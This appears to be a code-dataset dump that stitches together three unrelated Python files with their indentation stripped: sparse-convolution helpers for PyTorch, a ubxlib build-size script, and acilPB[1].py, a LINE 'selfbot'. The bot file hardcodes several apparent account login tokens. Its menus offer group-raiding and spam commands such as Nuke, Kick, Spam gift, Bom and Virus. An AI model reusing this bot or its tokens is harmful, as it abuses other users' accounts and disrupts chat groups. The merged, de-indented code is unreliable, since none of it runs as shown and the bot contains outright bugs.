def compare_sparse(x, y):
cL,cR,L,R = x.metadata.compareSparseHelper(y.metadata, x.spatial_size)
if x.features.is_cuda:
cL=cL.cuda()
cR=cR.cuda()
L=L.cuda()
R=R.cuda()
e = 0
if cL.numel():
e += (x.features[cL]-y.features[cR]).pow(2).sum()
if L.numel():
e += x.features[L].pow(2).sum()
if R.numel():
e += y.features[R].pow(2).sum()
return e / (cL.numel() + L.numel() + R.numel())
def spectral_norm_svd(module):
w=module.weight
if w.ndimension()==3:
w=w.view(-1,w.size(2))
_,s,_=torch.svd(w)
return s[0]
def pad_with_batch_idx(x,idx): #add a batch index to the list of coordinates
return torch.cat([x,torch.LongTensor(x.size(0),1).fill_(idx)],1)
def batch_location_tensors(location_tensors):
a=[]
for batch_idx, lt in enumerate(location_tensors):
if lt.numel():
a.append(pad_with_batch_idx(lt,batch_idx))
return torch.cat(a,0)
def prepare_BLInput(l,f):
with torch.no_grad():
n=max([x.size(0) for x in l])
L=torch.empty(len(l),n,l[0].size(1)).fill_(-1)
F=torch.zeros(len(l),n,f[0].size(1))
for i, (ll, ff) in enumerate(zip(l,f)):
L[i,:ll.size(0),:].copy_(ll)
F[i,:ff.size(0),:].copy_(ff)
return (L,F)
def checkpoint_restore(model,exp_name,name2,use_cuda=True,epoch=0):
if use_cuda:
model.cpu()
if epoch>0:
f=exp_name+'-%09d-'%epoch+name2+'.pth'
assert os.path.isfile(f)
print('Restore from ' + f)
model.load_state_dict(torch.load(f))
else:
f=sorted(glob.glob(exp_name+'-*-'+name2+'.pth'))
if len(f)>0:
f=f[-1]
print('Restore from ' + f)
model.load_state_dict(torch.load(f))
epoch=int(f[len(exp_name)+1:-len(name2)-5])
if use_cuda:
model.cuda()
return epoch+1
def is_power2(num):
return num != 0 and ((num & (num - 1)) == 0)
def has_only_one_nonzero_digit(num): #https://oeis.org/A037124
return num != 0 and (num/10**math.floor(math.log(num,10))).is_integer()
def checkpoint_save(model,exp_name,name2,epoch, use_cuda=True):
f=exp_name+'-%09d-'%epoch+name2+'.pth'
model.cpu()
torch.save(model.state_dict(),f)
if use_cuda:
model.cuda()
#remove previous checkpoints unless they are a power of 2 to save disk space
epoch=epoch-1
f=exp_name+'-%09d-'%epoch+name2+'.pth'
if os.path.isfile(f):
if not is_power2(epoch):
os.remove(f)
def random_rotation(dimension=3):
return torch.qr(torch.randn(dimension,dimension))[0]
class LayerNormLeakyReLU(torch.nn.Module):
def __init__(self,num_features,leakiness):
torch.nn.Module.__init__(self)
self.leakiness=leakiness
self.in1d=torch.nn.LayerNorm(num_features)
def forward(self,x):
if x.features.numel():
x.features=self.in1d(x.features)
x.features=torch.nn.functional.leaky_relu(x.features,self.leakiness,inplace=True)
return x
def voxelize_pointcloud(xyz,rgb):
xyz,inv,counts=np.unique(xyz.long().numpy(),axis=0,return_inverse=True,return_counts=True)
xyz=torch.from_numpy(xyz)
inv=torch.from_numpy(inv)
rgb_out=torch.zeros(xyz.size(0),rgb.size(1),dtype=torch.float32)
rgb_out.index_add_(0,inv,rgb)
return xyz, rgb_out/torch.from_numpy(counts[:,None]).float()
|
static_size.py
|
#!/usr/bin/env python
'''Build the platform independent, non-test related code of ubxlib to establish static sizes.'''
from multiprocessing import Process, freeze_support # Needed to make Windows behave
# when run under multiprocessing,
from signal import signal, SIGINT # For CTRL-C handling
from time import time, sleep
import os
import sys # For exit() and stdout
import argparse
import subprocess
import psutil # For killing things (make sure to do pip install psutil)
import platform # Figure out current OS
# Expected name for compiler
GNU_COMPILER = "arm-none-eabi-gcc"
# Expected name for linker
GNU_LINKER = "arm-none-eabi-gcc"
# Expected name for size
GNU_SIZE = "arm-none-eabi-size"
# The guard time in seconds for each compilation
# This may seem quite large: reason is that this script
# can sometimes be run on a *very* heavily loaded test
# machine which can take some considerable time finding
# CPU memory to launch a process
GUARD_TIME_SECONDS = 120
# Sub-directory to use when building
BUILD_SUBDIR = "build"
def signal_handler(sig, frame):
'''CTRL-C Handler'''
del sig
del frame
sys.stdout.write('\n')
print("CTRL-C received, EXITING.")
sys.exit(-1)
def get_flags(string, name):
'''Get CFLAGS or LDFLAGS as a list from str or the environment'''
answer_list = []
if not string and name in os.environ:
string = os.environ[name]
if string:
answer_list = string.split(" ")
return answer_list
def read_list_from_file(file):
'''Read a list, line by line, from a file'''
output_list = []
# Read list
temp_list = [line.strip() for line in open(file, 'r')]
for item in temp_list:
# Throw away comment lines
item = item.strip()
if item and not item.startswith("#"):
output_list.append(item)
return output_list
def exe_terminate(process_pid):
'''Jonathan's killer'''
process = psutil.Process(process_pid)
for proc in process.children(recursive=True):
proc.terminate()
process.terminate()
# subprocess arguments behaves a little differently on Linux and Windows
# depending if a shell is used or not, which can be read here:
# https://stackoverflow.com/a/15109975
# This function will compensate for these deviations
def subprocess_osify(cmd, shell=True):
''' expects an array of strings being [command, param, ...] '''
if platform.system() == "Linux" and shell:
line = ''
for c in cmd:
# Put everything in a single string and quote args containing spaces
if ' ' in c:
line += '\"{}\" '.format(c)
else:
line += '{} '.format(c)
cmd = line
return cmd
def exe_run(call_list, guard_time_seconds, shell_cmd=False):
'''Call an executable, printing out what it does'''
success = False
start_time = time()
kill_time = None
try:
popen_keywords = {
'stdout': subprocess.PIPE,
'stderr': subprocess.STDOUT,
'shell': shell_cmd
}
process = subprocess.Popen(subprocess_osify(call_list, shell=shell_cmd),
**popen_keywords)
while process.poll() is None:
string = process.stdout.readline()
if string:
print("{}".format(string.decode()), end="")
if guard_time_seconds and (kill_time is None) and \
(time() - start_time > guard_time_seconds):
kill_time = time()
print("guard time of {} second(s)." \
" expired, stopping {}...".
format(guard_time_seconds, call_list[0]))
exe_terminate(process.pid)
if (process.poll() == 0) and kill_time is None:
success = True
except ValueError as ex:
print("failed: {} while trying to execute {}.". \
format(type(ex).__name__, str(ex)))
return success
# Note: we don't bother with make here as there are few files,
# this is usually run as part of automated testing where a
# clean build is required anyway and make can be a but funny
# about platform differences for if/when we want to run this
# on Linux
def build(source_list, include_list, cflag_list, ldflag_list, gcc_bin_dir):
'''Build source_list with include_list and flags under GCC'''
return_value = 0
obj_list = []
# Make the include list
for idx, item in enumerate(include_list):
include_list[idx] = "-I" + item
# Compile all the source files
for item in source_list:
call_list = [gcc_bin_dir + os.sep + GNU_COMPILER]
call_list.extend(include_list)
call_list.extend(cflag_list)
call_list.append("-c")
call_list.append(item)
# Print what we're gonna do
tmp = ""
for another_item in call_list:
tmp += " " + another_item
print("{}".format(tmp))
if not exe_run(call_list, GUARD_TIME_SECONDS, True):
return_value = -1
# Relax a little between files to let others in
sleep(0.1)
if return_value == 0:
# Now link them
for file in source_list:
parts = file.split("/")
file = parts[len(parts) - 1]
file = file.replace(".cpp", ".o")
file = file.replace(".c", ".o")
obj_list.append(file)
call_list = [gcc_bin_dir + os.sep + GNU_LINKER]
call_list.extend(obj_list)
# Order is important: has to be after the object
# list or libraries (e.g. -lm) might not be resolved
call_list.extend(ldflag_list)
call_list.append("-o")
call_list.append("total_with_clib.elf")
# Print what we're gonna do
tmp = ""
for item in call_list:
tmp += " " + item
print("{}".format(tmp))
if not exe_run(call_list, GUARD_TIME_SECONDS, True):
return_value = -1
if return_value == 0:
# Call size on the result
call_list = [gcc_bin_dir + os.sep + GNU_SIZE]
call_list.append("-G")
call_list.extend(obj_list)
call_list.append("total_with_clib.elf")
# Print what we're gonna do
tmp = ""
for item in call_list:
tmp += " " + item
print("{}".format(tmp))
if not exe_run(call_list, GUARD_TIME_SECONDS, True):
return_value = -1
return return_value
def main(source_files, include_paths, cflags, ldflags, gcc_bin_dir,
ubxlib_dir, working_dir):
'''Main as a function'''
return_value = 1
saved_path = None
cflag_list = []
ldflag_list = []
test_call = []
signal(SIGINT, signal_handler)
# Print out what we've been told to do
text = "compiling list of files from \"" + source_files + "\"" \
" with list of include paths from \"" + include_paths + "\""
if cflags:
text += ", with CFLAGS \"" + cflags + "\""
else:
text +=", with CFLAGS from the environment"
if ldflags:
text += ", with LDFLAGS \"" + ldflags + "\""
else:
text +=", with LDLAGS from the environment"
if gcc_bin_dir:
text += ", with GCC from \"" + gcc_bin_dir + "\""
else:
text +=", with GCC on the PATH"
if ubxlib_dir:
text += ", ubxlib directory \"" + ubxlib_dir + "\""
if working_dir:
text += ", working directory \"" + working_dir + "\""
print("{}.".format(text))
# Read the source files and include paths
source_list = read_list_from_file(source_files)
include_list = read_list_from_file(include_paths)
if ubxlib_dir:
# Prepend ubxlib to them
for idx, item in enumerate(source_list):
source_list[idx] = ubxlib_dir + os.sep + item
for idx, item in enumerate(include_list):
include_list[idx] = ubxlib_dir + os.sep + item
cflag_list = get_flags(cflags, "CFLAGS")
ldflag_list = get_flags(ldflags, "LDFLAGS")
saved_path = os.getcwd()
if working_dir:
os.chdir(working_dir)
else:
if not os.path.isdir(BUILD_SUBDIR):
os.mkdir(BUILD_SUBDIR)
os.chdir(BUILD_SUBDIR)
# Check that the compiler can be found
print("checking that GCC is installed...")
if gcc_bin_dir:
test_call.append(gcc_bin_dir + os.sep + GNU_COMPILER)
test_call.append("--version")
if exe_run(test_call, GUARD_TIME_SECONDS, True):
# Do the build
return_value = build(source_list, include_list, cflag_list,
ldflag_list, gcc_bin_dir)
else:
print("unable to run GCC.\n")
if saved_path:
os.chdir(saved_path)
return return_value
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(description="A script to" \
" build a list of files" \
" with a given GCC compiler;" \
" if the compiler is not on" \
" the path it can be" \
" supplied as a command-line" \
" parameter. The following" \
" environment variables" \
" affect operation:\n" \
" CFLAGS will be passed to" \
" the compiler unless the" \
" command-line parameter -c" \
" is provided,\n" \
" LDFLAGS will be passed to" \
" the linker unless the" \
" command-line parameter -l" \
" is provided.\n")
PARSER.add_argument("-p", help="path to the bin directory of" \
" GCC, e.g. \"C:/Program Files (x86)/GNU" \
" Arm Embedded Toolchain/10 2020-q4-major/bin\"")
PARSER.add_argument("-c", help="flags to be passed to the" \
" compiler, e.g. \"-Os -g0 -mcpu=cortex-m4"\
" -mfloat-abi=hard -mfpu=fpv4-sp-d16" \
" -DU_CFG_APP_PIN_CELL_ENABLE_POWER=-1" \
" -DMY_FLAG -DMY_STRING=thisisastring\".")
PARSER.add_argument("-l", help="flags to be passed to the" \
" linker, e.g. \"-Os -g0 -mcpu=cortex-m4" \
" -mfloat-abi=hard -mfpu=fpv4-sp-d16" \
" --specs=nano.specs -lc -lnosys -lm\".")
PARSER.add_argument("-u", help="the root directory of ubxlib.")
PARSER.add_argument("-w", help="an empty working directory to" \
" use; if none is given \"" + BUILD_SUBDIR + \
"\" will be created and used.")
PARSER.add_argument("source", nargs="?", default="source.txt", \
help="a file containing the list of source"\
" files to compile, each on a single line.")
PARSER.add_argument("include", nargs="?", default="include.txt",\
help="a file containing the list of include"\
" paths required to compile the source," \
" each on a single line.")
ARGS = PARSER.parse_args()
# Call main()
RETURN_VALUE = main(ARGS.source, ARGS.include, ARGS.c, ARGS.l,
ARGS.p, ARGS.u, ARGS.w)
sys.exit(RETURN_VALUE)
# A main is required because Windows needs it in order to
# behave when this module is called during multiprocessing
# see https://docs.python.org/2/library/multiprocessing.html#windows
if __name__ == '__main__':
freeze_support()
PROCESS = Process(target=main)
PROCESS.start()
|
acilPB[1].py
|
# -*- coding: utf-8 -*-
import PRANKBOTS
from PRANKBOTS.lib.curve.ttypes import *
from datetime import datetime
import io,os,re,ast,six,sys,glob,json,time,timeit,codecs,random,shutil,urllib,urllib2,urllib3,goslate,html5lib,requests,threading,wikipedia,subprocess,googletrans
from gtts import gTTS
from random import randint
from time import sleep
from urllib import urlopen, urlretrieve, urlencode
from io import StringIO
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
if (six.PY2):
import urllib2
import urllib
else:
import urllib.request
import urllib.parse
acil = PRANKBOTS.LINE()
acil.login(token="ErYWjY9YV79Z38JKxKo3.Zyqdf0szEvhn7GgnUvgUOW.UjX05iErsgigbASwAmC2c+XpFJ6lR5Tz3fa/+/Zf6bk=")
acil.loginResult()
ki = PRANKBOTS.LINE()
ki.login(token="EriNWY115rLz2hdl48v6.AtUxbv5bm36lwyvJZPmvLG.oLcFDSxUslenk2Rz2XQg1E/dUM90SsPowtl3mIsCh+w=")
ki.loginResult()
ki2= PRANKBOTS.LINE()
ki2.login(token="ErnJswlRxEo8wSuOebF3.MH2J3w8lfsAoWo4z8qxeuW.pmKfHC0OdXbZY5pUV/Ruyu1NohldbTi/nfmPsBzMvds=")
ki2.loginResult()
ki3 = PRANKBOTS.LINE()
ki3.login(token="ErkFmsynownacQGE3XDf.pMI0m8HrhHEeXjG/H6SepW.yLA1mS6JHgxa7qZzjVQ5JbbB3UFJPR0b4nxCbMc6qLY=")
ki3.loginResult()
ki4 = PRANKBOTS.LINE()
ki4.login(token="Er8h61l1jTFFUVf3e13a.NSj60VJy3+WTBIuVnvXHwG.wkwr4TT7v1FWJv4KfHc/Q2yDXxx7deHxXvq65XHjCJg=")
ki4.loginResult()
ki5 = PRANKBOTS.LINE()
ki5.login(token="ErzbXhPnCAsXlc6MA7i3.duo4C3Drdvi2rzJhZXuAaW.mkuqhMhfYByBeUBHcwNeGwpTRoaBxBFv5pSbT/yqcMo=")
print "login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage="""(╣••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║1║ ✰ Me
║2║ ✰ Add
║3║ ✰ Gift
║4║ ✰ Spam gift️
║5║ ✰ Cn "text"
║6║ ✰ Clockname "text"
║7║ ✰ TL:"text"
║8║ ✰ Ban:"mid"
║9║ ✰ Unban:"mid"
║10║ ✰ Bl:on
║11║ ✰ Unbl:on
║12║ ✰ Mcheck
║13║ ✰ Mybio:
║14║ ✰ Mybots
║15║ ✰ Mymid
║16║ ✰ Mygroups
║17║ ✰ Group id
║18║ ✰ Message set:"text"
║19║ ✰ Message confirm
║20║ ✰ Msg add-"text"
║21║ ✰ Com set:"text"
║22║ ✰ Comment
║13║ ✰ Comban/del/cek
║24║ ✰ Help set:"text"
║25║ ✰ Change
║26║ ✰ Gn "text"
║27║ ✰ Clink/Curl
║28║ ✰ Kick:"mid"
║29║ ✰ Invite:"mid"
║30║ ✰ Creator
║31║ ✰ Gcancel:"jumlah"
║32║ ✰ Gcancelall
║33║ ✰ Ginfo
║34║ ✰ Check
║35║ ✰ Cctv
║36║ ✰ Glink
║37║ ✰ Spam on/off
║38║ ✰ Gurl
║39║ ✰ Clink
║40║ ✰ Blocklist
║41║ ✰ Banlist
║42║ ✰ Update
║23║ ✰ Creator
║44║ ✰ Sc:"mid"
║45║ ✰ Ban "@"
║46║ ✰ Unban "@"
║47║ ✰ Sc @
║48║ ✰ Nuke
║49║ ✰ Backup
║50║ ✰ Tagall
║51║ ✰ Kick@mbl
║52║ ✰ Reinvite
║53║ ✰ Conban
║54║ ✰ Clearban
║55║ ✰ Gid
║56║ ✰ Grupname
║57║ ✰ Lurk:on/off
║58║ ✰ Lurkers
║59║ ✰ Wc️
║60║ ✰ Sp
║61║ ✰ stafflist
║62║ ✰ Reboot
║63║ ✰ Leaveallgroup
║64║ ✰ Pmfavorite
║65║ ✰ Broken
║╩═══NEXT PAGE═══╦
║║ ✰ Allprotect:on/off
║║ ✰ Admin:add @
║║ ✰ Admin:del @
║║ ✰ Adminlist/Listadmin
║╩═══NEXT PAGE═══╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩════════╝
"""
helpMessage1="""(╣••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║╩═ADMIN+OWNER═╦
║1║ ✰ Me
║2║ ✰ Smule
║3║ ✰ Google
║4║ ✰ Getinfo @
║5║ ✰ Getbio @
║6║ ✰ Getprofile @
║7║ ✰ Twitter
║8║ ✰ Playstore
║9║ ✰ Respon
║10║ ✰ Getvid @
║11║ ✰ Getcontact @
║12║ ✰ Getname @
║13║ ✰ Mybio
║14║✰ Myname
║15║ ✰ Mypict
║16║✰ Myvid
║17║ ✰ Mycover
║18║ ✰ Urlcover
║19║ ✰ Urlpict/picturl
║20║ ✰ Getmid @
║21║ ✰ Youinfo @
║22║ ✰ Say
║13║ ✰ Tagall
║24║ ✰ Github
║25║ ✰ Wc
║26║ ✰ Wikipedia
║27║ ✰ Xvideo
║28║ ✰ Picturl @
║29║ ✰ Coverurl @
║30║ ✰ Sider:on/off
║31║ ✰ Invite:user
║╩═══ADMIN═══╦
║║ ✰ { Media }
║║ ✰ { Set }
║║ ✰ {Helpbots}
║║ ✰ {Settings}
║║ ✰ {Setauto}
║║ ✰ Allprotect:on/off
║║ ✰ Admin:add @
║║ ✰ Admin:del @
║║ ✰ Adminlist/Listadmin
║║ ✰ Leaveallgroup
║║ ✰ Botallbye
║║ ✰ Sendgroup *txt
║║ ✰ Sendcontact *txt
║║ ✰ Sendpm *txt
║║ ✰ Virus
╚══╩═══════╝
"""
helpMedia="""(╣••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║╦═══MEDIA═══
║1║ ✰ Youtube *text*
║2║ ✰ Youtubesearch *user*
║3║ ✰ Audio "text"
║4║ ✰ Lirik "text"
║5║ ✰ Ig "name"
║5║ ✰ Tts "judul/nama band"
║6║ ✰ Gimage
║7║ ✰ Image *text*
║8║ ✰ google *text*
║9║ ✰ Micadd @
║10║ ✰ Micdel @
║11║ ✰ Miclist
║12║ ✰ Picturl @
║13║ ✰ Coverurl @
║14║ ✰ Copy @
║15║ ✰ Getname @
║16║ ✰ Getinfo @
║17║ ✰ pict @️
║18║ ✰ Getcontact @
║19║ ✰ Getvid @
║20║ ✰ Getmid @
║21║ ✰ Copy @
║22║ ✰ Recopy
║23║ ✰ Getcover @
║24║ ✰ Getbio @
║25║ ✰ Getinfo @
║26║ ✰ youinfo @
║27║ ✰ info "mid"
║28║ ✰ Contact "mid"
║29║ ✰ Id "idline"
║30║ ✰ Memlist
║31║ ✰ Setimage:
║32║ ✰ Papimage
║33║ ✰ Setvideo:
║34║ ✰ Papvideo
║25║ ✰ Checkdate
║36║ ✰ Myname
║37║ ✰ Mybio
║38║ ✰ Mypict
║39║ ✰ Myvid
║40║ ✰ Urlpict
║41║ ✰ Mycover
║42║ ✰ Urlcover
║43║ ✰ Hay "text"
║44║ ✰ Record "text"
║45║ ✰ Xvideo "text"
║46║ ✰ Cmule "id smule"
║47║ ✰ Time
║48║ ✰ Imagetxt "text"
║49║ ✰ Cuaca*txt
║50║ ✰ Lokasi*txt
║51║ ✰ Shalat*txt
║52║ ✰ Anime"text"
║53║ ✰ Cekmovie"text"
║54║ ✰ Video"text"
║55║ ✰ Playstore"txt"
║56║ ✰ Twitter*txt
║57║ ✰ Klip"text"
║48║✰ Github*txt
║59║✰ facebook*txt
║60║✰ Wikipedia*txt
║61║✰ Checkdate*ttl
║62║✰ Vikur
║╩══BROADCAST═══
║📩║ ✰ sendpm "text"
║📨║ ✰ sendgrup "text"
║╩═══NEXT PAGE═╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
"""
helpFun = """(╣℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║╦═══MEDIA═══
║1║ ✰ sider:*txt*
║2║ ✰ tagme:*txt
║3║ ✰ welcome:*txt
║4║ ✰ left:*txt
║5║ ✰ message set:*txt*
║6║ ✰ STKID:*sticker id
║7║ ✰ STKPKGID:*stkr gid
║8║ ✰ STKVER:*version
║9║ ✰ cekresponse
║╩══NEXT PAGE══╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
"""
helpself="""
╔╦═C༘֮֮O༘֮֮M༘֮֮M༘֮֮A༘֮֮N༘֮֮D༘֮֮ ֮A༘֮֮L༘֮֮L༘֮֮ ֮B༘֮֮O༘֮֮T༘֮֮S༘֮֮═╦╗
║ ═══════════║
║1║ ✰ Fuck1/10 "@"
║2║ ✰ Kick1/10 "@"
║3║ ✰ All mid
║4║ ✰ Reinvite
║5║ ✰ B1-10 mid
║6║ ✰ B1-10name "text"
║7║ ✰ B1-10
║8║ ✰ B1-10 gift
║9║ ✰ B1-10 in
║10║ ✰ B1-10 bye
║11║ ✰ Bc "text"
║12║ ✰ Say "text"
║13║ ✰ Bom "text"
║14║ ✰ Allgift
║15║ ✰ Spam gift️
║16║ ✰ Botcopy
║18║ ✰ Botbackup
║19║ ✰ Botpict
║20║ ✰ Botcover
║21║ ✰ Botak
║22║ ✰ Allname "nama"
║23║ ✰ Allbio "status"
║24║ ✰ Sendcontact "text"
║25║ ✰ Botbyeall
║••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••
╚═══════════╝
"""
helpset="""╔(╣ S༘̏̏Ȅ༘̏T༘̏̏T༘̏̏Ȉ༘̏N༘̏̏G༘̏̏ ̏B༘̏̏Ȍ༘̏T༘̏̏S༘̏̏.╣)╗
║ ✰ Ban:on/Unbl:on
║ ✰ Contact:on/off
║ ✰ Add:on/off
║ ✰ Join:on/off
║ ✰ Leave:on/off
║ ✰ Share:on/off
║ ✰ Com:on/off
║ ✰ Clock:on/off
║ ✰ Respon:on/off
║ ✰ Stickertag:on/off
║ ✰ Welcome:on/off
║ ✰ Left:on/off
║ ✰ Sider:on/off
║ ✰ Notag:on/off
║ ✰ Mimic on/off
║ ✰ Simsimi:on/off
║ ✰ Read:0n/off
║ ✰ Like:on/off
║ ✰ Runtime
║═(╣S̰֮֮Ḛ֮֮T̰֮֮T̰֮֮Ḭ֮֮N̰֮֮G̰֮֮ ֮G̰֮֮R̰֮֮O̰֮֮Ṵ֮֮P̰֮֮S̰֮֮╣)═
║ ★ Pro:on/off
║ ★ Prolink:on/off
║ ★ Proinvite:on/off
║ ★ Procancel:on/off
║ ★ Namelock:on/off
║ ★ Projoin:on/off
║ ★ Allprotect:on/off
║╩═══NEXT PAGE═╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
║ ╦═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╦
╚═•℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́•╝
"""
translateMessage ="""
╔══════════
║(╣℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́╣)
║╔═════════
║══════════
║✰║ Afrika/
║✰║ Albanian/
║✰║ Arab/
║✰║ Armenian/
║✰║ Bengali/
║✰║ Catalan/
║✰║ Chinese/
║✰║ Croatian/
║✰║ Czech/
║✰║ Danish/
║✰║ Dutch/
║✰║ English/
║✰║ Australia/
║✰║ Uk/
║✰║ Us/
║✰║ Esperanto/
║✰║ Finnish/
║✰║ French/
║✰║ German/
║✰║ Greek/
║✰║ Hindi/
║✰║ Hungarian/
║✰║ Icelandic/
║✰║ Indonesia/
║✰║ Italia/
║✰║ Japanese/
║✰║ Khmer/
║✰║ Korean/
║✰║ Latin/
║✰║ Latvian/
║✰║ Macedonian/
║✰║ Malaysia/
║✰║ Norwegian/
║✰║ Polish/
║✰║ Portuguese/
║✰║ Romanian/
║✰║ Russian/
║✰║ Sarbian/
║✰║ Sinhala/
║✰║ Slovak/
║✰║ Spanish/
║✰║ Spain/
║✰║ Swadhili/
║✰║ Swedish/
║✰║ Tamil/
║✰║ Thai/
║✰║ Turki/
║✰║ Ukrainian/
║✰║ Vietnam/
║✰║ Welsh/
║╩═══NEXT PAGE═╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
"""
KAC=[acil,ki,ki2,ki3,ki4,ki5]
mid = acil.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
Bots=[mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
admsa = "ucd84031744997951cdee018db951aea3" #MID SELFBOT
PRANKBOT = ["ufce863f62f40706c01fa4a3c3c4cb096"] #MID OWNER
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'tagme':"message tag belum di set",
'sider1':"message sider belum di set",
'joingc':"message member join belum di set",
'leftgc':"message member left belum di set",
"stickerMention":False,
'message':"""THANKS FOR ADD ME\n\nSUBCRABE ME ON YOUTUBE\n\nhttps://www.youtube.com/channel/UCycBrqSWEHdk-slnhUmGWiQ""",
"lang":"JP",
"comment":"Thanks For Add Me",
"comment1":"|======AUTO LIKE======|\n\nSUBCRABE ME ON YOUTUBE\n\nhttps://www.youtube.com/channel/UCycBrqSWEHdk-slnhUmGWiQ\n\nMENERIMA PESANAN SELFBOT MINAT.!!\nINFO LANGSUNG KE\n\nID:::::http://line.me/ti/p/~adiputra.95",
"commentOn":False,
"likeOn":True,
"wcOn":True,
"leftOn":True,
"alwayRead":False,
"Removechat":False,
"detectMention":True,
"kickMention":False,
"cpp":True,
"steal":False,
'pap':{},
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"cNames":"",
"blacklist":{},
"ACIL":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"atjointicket":True,
"potoMention":{},
"prankName":True,
"Sider":{},
"cyduk":{},
"pname":{},
"pro_name":{},
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read)
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
